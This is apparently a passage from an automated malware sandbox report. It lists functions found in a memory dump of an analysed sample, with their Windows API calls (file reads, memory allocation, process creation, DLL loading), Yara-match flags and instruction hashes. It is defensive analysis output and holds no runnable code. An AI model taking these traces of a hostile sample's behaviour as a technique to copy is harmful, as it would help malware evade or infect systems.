                                                                                    • NtReadFile.NTDLL(01043D52,5E972F59,FFFFFFFF,01043A11,?,?,01043D52,?,01043A11,FFFFFFFF,5E972F59,01043D52,?,00000000), ref: 010482B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction ID: 0f939ef50450ad873d3cf9aa7d8b8e4c1ed0efc62998516b62c96aea216f6bf4
                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction Fuzzy Hash: 04F0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158659BA5D97241DA30E811CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0104826C, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(01043D52,5E972F59,FFFFFFFF,01043A11,?,?,01043D52,?,01043A11,FFFFFFFF,5E972F59,01043D52,?,00000000), ref: 010482B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                                                    • Instruction ID: 3f8a42615a47347329088df65f1e5ebfc1f9ac8abe18bd50064c2ff89f1f7cfb
                                                                                    • Opcode Fuzzy Hash: d0f7569fab7b448f5a1a463fb8156397a3bb805055009ba2f4a72d62b48a18fb
                                                                                    • Instruction Fuzzy Hash: 1CF0BDB6200104AFCB14DF89DC80DEB77A9FF8C354F158659FA5D97250D630E911CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010483A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01032D11,00002000,00003000,00000004), ref: 010483D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction ID: 2c96e0454847604b259ea199f4665684f7308d7d746f1fda28213bc1cc14bbc2
                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction Fuzzy Hash: 76F015B2200208ABCB14EF89CC80EEB77ADAF88650F118559FE4897241C630F810CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010482F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(01043D30,?,?,01043D30,00000000,FFFFFFFF), ref: 01048315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction ID: 03d8dda1ec24253df4317e5d93d1ff50c7b8272dc533aa91c6dd06807f760921
                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction Fuzzy Hash: F2D012752002146BD710EFD8CC85ED7775CEF44650F154455BA585B241C530F90086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 1f072d7ecabebef618c65b98987b2b3864da7b03ab2f3be5440cf4184f46b98c
                                                                                    • Instruction ID: 35b0d0c93d2709de6b53651ddefd7f3b805485af43dcf951e6aca4ea72fe6dff
                                                                                    • Opcode Fuzzy Hash: 1f072d7ecabebef618c65b98987b2b3864da7b03ab2f3be5440cf4184f46b98c
                                                                                    • Instruction Fuzzy Hash: 0B90026121184443D201A5A94C14B070005D7D0343F51C155B9148664CCA558CA96561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 038499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: eae84c8a7bca5219f882f058c681ffd4cf3295878e380044bf0d92983ca513f3
                                                                                    • Instruction ID: 61e154262b1a682208de69f48ab1791584a0c0f06bd2f20e4a7081efee9ba6f3
                                                                                    • Opcode Fuzzy Hash: eae84c8a7bca5219f882f058c681ffd4cf3295878e380044bf0d92983ca513f3
                                                                                    • Instruction Fuzzy Hash: F69002A134104843D101A1994414B060005D7E1341F51C055FA058664D8759CC9A7166
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 39304b56435a96f9b453bb0fadb1ed7a25e23f105229244619136c22285c146f
                                                                                    • Instruction ID: ad086b8e1aec3699c654b88fb55e35daf1df276cb59bd4b7798ae2c06399336f
                                                                                    • Opcode Fuzzy Hash: 39304b56435a96f9b453bb0fadb1ed7a25e23f105229244619136c22285c146f
                                                                                    • Instruction Fuzzy Hash: A79002B120104803D141B19944047460005D7D0341F51C051BE058664E87998DDD76A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c08a6ab1d0945484b2d8c73ad2ea4c7a0fbbbf4c04f2e99dfd13cdfdd503f327
                                                                                    • Instruction ID: cc5a3e6cf5917f4a7cdfc5afc112f003a00eef132d5a766327ee7f5cf8ff3f63
                                                                                    • Opcode Fuzzy Hash: c08a6ab1d0945484b2d8c73ad2ea4c7a0fbbbf4c04f2e99dfd13cdfdd503f327
                                                                                    • Instruction Fuzzy Hash: 1F900261242085535546F19944045074006E7E0281791C052BA408A60C86669C9EE661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 43e40b3c8bc475b4623ceefe936b776133fe0974aaf8453ccb113dfa63e86f41
                                                                                    • Instruction ID: eb096b1672b30c890f155c163922c20b16ce868a56de5232fa6d49098d0163d9
                                                                                    • Opcode Fuzzy Hash: 43e40b3c8bc475b4623ceefe936b776133fe0974aaf8453ccb113dfa63e86f41
                                                                                    • Instruction Fuzzy Hash: 9590027120104813D112A19945047070009D7D0281F91C452B9418668D97968D9AB161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f8138bf5b85e7efeae0ef5a8a5e9ac875c2ca6a419476b9343ead213356f3754
                                                                                    • Instruction ID: 1e54d986c89618dabaa2285e92208d680d6d82e3889eaa603003a8c1bfdca4ea
                                                                                    • Opcode Fuzzy Hash: f8138bf5b85e7efeae0ef5a8a5e9ac875c2ca6a419476b9343ead213356f3754
                                                                                    • Instruction Fuzzy Hash: D590026921304403D181B199540860A0005D7D1242F91D455B9009668CCA558CAD6361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 95bf455085af4c736ef3f2b792fe11066b05a827f7b7917c373527e1ce9ac978
                                                                                    • Instruction ID: e945d86ad9e3adeed930203b26325d54c126479779e52e358e17661513bab4b6
                                                                                    • Opcode Fuzzy Hash: 95bf455085af4c736ef3f2b792fe11066b05a827f7b7917c373527e1ce9ac978
                                                                                    • Instruction Fuzzy Hash: EB90027131118803D111A19984047060005D7D1241F51C451B9818668D87D58CD97162
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5cfc67f17c3bbce86cbfb614d382a917d0acbddd19772f47c7f57fdaeb09445e
                                                                                    • Instruction ID: 3648cba5a327cadf4aefd5de22b264e6cb4715355cc70377b9865a8e930ae1d8
                                                                                    • Opcode Fuzzy Hash: 5cfc67f17c3bbce86cbfb614d382a917d0acbddd19772f47c7f57fdaeb09445e
                                                                                    • Instruction Fuzzy Hash: 9290027120104803D101A5D954086460005D7E0341F51D051BE018665EC7A58CD97171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 038496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 89cad3a47604bf209d92d0ca9b8e16ee865a38f398bd89f669d69fa25ac8f175
                                                                                    • Instruction ID: e14ad82416519e65e90a50a685f1a9d2fa61ebff5c1367b8c0869bf73ea65f26
                                                                                    • Opcode Fuzzy Hash: 89cad3a47604bf209d92d0ca9b8e16ee865a38f398bd89f669d69fa25ac8f175
                                                                                    • Instruction Fuzzy Hash: A190027120104C43D101A1994404B460005D7E0341F51C056B9118764D8755CC997561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 038496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b15dbcee663c29e8703daec1de39d8e237c7b6ca17c0155243ca0e13fe303ce5
                                                                                    • Instruction ID: 5652cb46c5cbcf989c5cc83ed2a30c239a2e22944dc80f41737adf018e1d63ab
                                                                                    • Opcode Fuzzy Hash: b15dbcee663c29e8703daec1de39d8e237c7b6ca17c0155243ca0e13fe303ce5
                                                                                    • Instruction Fuzzy Hash: 789002712010CC03D111A199840474A0005D7D0341F55C451BD418768D87D58CD97161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 32c0fda037491414bcdf18835aa759a725c37a72761257a25f311d5f24e85677
                                                                                    • Instruction ID: 87d7f80fcc37bc5fc9734053070542bc6b264cb25bfa2c52f42e1f91d3ce8cdf
                                                                                    • Opcode Fuzzy Hash: 32c0fda037491414bcdf18835aa759a725c37a72761257a25f311d5f24e85677
                                                                                    • Instruction Fuzzy Hash: 8790027120508C43D141B1994404A460015D7D0345F51C051B90587A4D97658D9DB6A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 919c9109867f2135f1d63180c175df71e2e6b179b686dd1042d58bb3d7dc7cb9
                                                                                    • Instruction ID: b78977f4954e2ba6df0f2f7f67acd48bf3b4627c8f78b2712a8affa6d03b6900
                                                                                    • Opcode Fuzzy Hash: 919c9109867f2135f1d63180c175df71e2e6b179b686dd1042d58bb3d7dc7cb9
                                                                                    • Instruction Fuzzy Hash: 1890027120104C03D181B199440464A0005D7D1341F91C055B9019764DCB558E9D77E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 038495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 74100b98950d32d99edb46269edabf59a16f25adbbc9cb5a8dfce650670831a2
                                                                                    • Instruction ID: 9a1d7c439e35ad1d46d90e7186deb4ca3ebb1f47402266cae39b245c2a85649c
                                                                                    • Opcode Fuzzy Hash: 74100b98950d32d99edb46269edabf59a16f25adbbc9cb5a8dfce650670831a2
                                                                                    • Instruction Fuzzy Hash: 2A9002A1202044034106B1994414616400AD7E0241B51C061FA0086A0DC6658CD97165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03849540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b6d4b1e32382394998c61c03ff144d90e2fa9a7e5f90dd85bcf5f30923c6a74f
                                                                                    • Instruction ID: 92952f47864d4f7b01b787b649f01a120ae844f0c8477f81ec1b83f8a98aab78
                                                                                    • Opcode Fuzzy Hash: b6d4b1e32382394998c61c03ff144d90e2fa9a7e5f90dd85bcf5f30923c6a74f
                                                                                    • Instruction Fuzzy Hash: 20900265211044030106E59907045070046D7D5391351C061FA009660CD7618CA96161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01046EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 01046F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 896141145925a1edd3a6881bb4eef2b1e85788ba5c32980c1aebebf55a15fbe4
                                                                                    • Instruction ID: 2d7d0cb65f3fe656c1daec39d99a87524df33f7646bf96c94e0a79be7a82d4d3
                                                                                    • Opcode Fuzzy Hash: 896141145925a1edd3a6881bb4eef2b1e85788ba5c32980c1aebebf55a15fbe4
                                                                                    • Instruction Fuzzy Hash: 333180B1601705ABD715DF68C8E0FA7B7F8AB48700F40856DF69A5B240E771A445CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01046EDB, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 01046F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 56f74d8fc538ab307462afc5aafb6be5006e2ca43798e8abfce2a013b3dbbe5f
                                                                                    • Instruction ID: 6f28bb97e8979db799ee670a5170ba2c0dcabd65a0437fea92709d08538c129e
                                                                                    • Opcode Fuzzy Hash: 56f74d8fc538ab307462afc5aafb6be5006e2ca43798e8abfce2a013b3dbbe5f
                                                                                    • Instruction Fuzzy Hash: 83219EB1601305ABD711DFA8C8E0FABB7F8AB48704F40806DF6996B281E771A445CBE5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010484C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01033B93), ref: 010484FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 3b8ea5be6fcef70c837e9cd7bbffddb1d3bec4dcf89ef1d557544cfc753c8fd9
                                                                                    • Instruction ID: 60d48f02e989270b65f253894ef8e7fdb38d312c2147dd594b4c56129123d7c8
                                                                                    • Opcode Fuzzy Hash: 3b8ea5be6fcef70c837e9cd7bbffddb1d3bec4dcf89ef1d557544cfc753c8fd9
                                                                                    • Instruction Fuzzy Hash: AFE092B5500215AFC718DF55DC4AE9BB76CEF84300F11CA9AF9485B251C631E814CFB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010484D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01033B93), ref: 010484FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction ID: d3dce581754b78596b36a8bb79e538c098f16331fc7f5bad01cbbf03ffc841df
                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction Fuzzy Hash: 59E04FB12002046BD714EF99CC44EE777ACEF88750F018555FD4857241C630F910CAF0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01037260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 010372BA
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 010372DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                                                    • Instruction ID: e809b3653a9171dbcff464c9ca7d2d20a5f66c38560f49929ab25ce4f1496a56
                                                                                    • Opcode Fuzzy Hash: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                                                    • Instruction Fuzzy Hash: 23012671A8032977E720A7948C42FFF776C9B50B50F040068FF84BA1C0E6D4690683F5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01039B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01039B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: 2006375c888aeacfbc6a3043e441f46e3e15ebaf223dd4dd062f63b11992a28e
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: 78011EB5E4020EBBDF14DBE4DD81FDEB7B89B54208F0041A5AA4897281F671E714CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01048540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 01048594
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction ID: 211728466ba9896446ec396b40d592cf1575194671126ddb15b66d6f8cd430cd
                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction Fuzzy Hash: ED01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA4D97240C630E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0104853F, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 01048594
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: fbe69861443396d500455a8c8e243eb0a366446f9d121da726b7e4b470b4c3f5
                                                                                    • Instruction ID: 1f7f494725a843e08ca18b37b479527b5a468769b4dda022ee5d75c548fa38cb
                                                                                    • Opcode Fuzzy Hash: fbe69861443396d500455a8c8e243eb0a366446f9d121da726b7e4b470b4c3f5
